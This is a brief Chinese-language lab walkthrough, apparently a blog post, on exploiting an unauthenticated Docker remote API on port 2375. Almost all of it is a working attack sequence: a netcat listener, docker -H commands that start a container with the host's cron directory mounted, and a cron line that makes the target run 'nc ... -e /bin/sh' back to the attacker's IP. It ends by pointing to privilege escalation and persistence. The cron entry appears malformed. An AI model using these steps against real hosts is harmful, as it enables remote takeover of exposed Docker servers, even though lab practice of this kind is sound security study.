标题docker未授权访问反弹shell
首先我们要扫描端口“2375“
发现目标端口2375开放,尝试访问ip:2375/version
目标靶机ip:192.168.30.101 (cente os 7)
攻击kali ip: 192.168.30.100 (kali2020.3)
访问出现版本泄露而且2375端口开放说明有未授权访问漏洞
在kali上开启监听1111端口
**nc -lvp 1111**
输入以下命令 ip为目标ip
docker -H tcp://192.168.30.101:2375 version
docker -H tcp://192.168.30.101:2375 run -id -v /etc/crontabs:/tmp alpine:latest
docker -H tcp://192.168.30.101:2375 ps
docker -H tcp://192.168.30.101:2375 exec -it 4e87ea04b049 sh
输入
echo '***** /usr/bin/nc 192.168.30.100 1111 -e /bin/sh' >> /tmp/root
cat /tmp/root
在端口1111终端接受到shell
就此反弹shell成功
接下来可以选择提权或者维持权限。。。。。
笔者太菜了